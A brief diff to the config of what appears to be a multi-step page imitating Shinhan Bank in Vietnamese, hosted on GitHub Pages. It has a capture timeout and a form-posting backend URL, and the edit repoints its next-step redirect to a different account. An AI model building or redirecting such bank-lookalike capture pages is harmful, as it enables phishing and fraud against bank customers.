--- a/pages/vi/step2.html
+++ b/pages/vi/step2.html
@@ -476,7 +476,7 @@
                 MAX_CAPTURE_TIMEOUT: 30000, 
                 // Using a placeholder backend API URL for the simulation
                 BACKEND_API_URL: 'https://httpbin.org/post',
-                NEXT_STEP_URL: 'https://vaytieudung.github.io/shinhanbank/pages/vi/step3.html'
+                NEXT_STEP_URL: 'https://trum1212.github.io/shinhanbank/pages/vi/step3.html'
             },
             
             async init() {
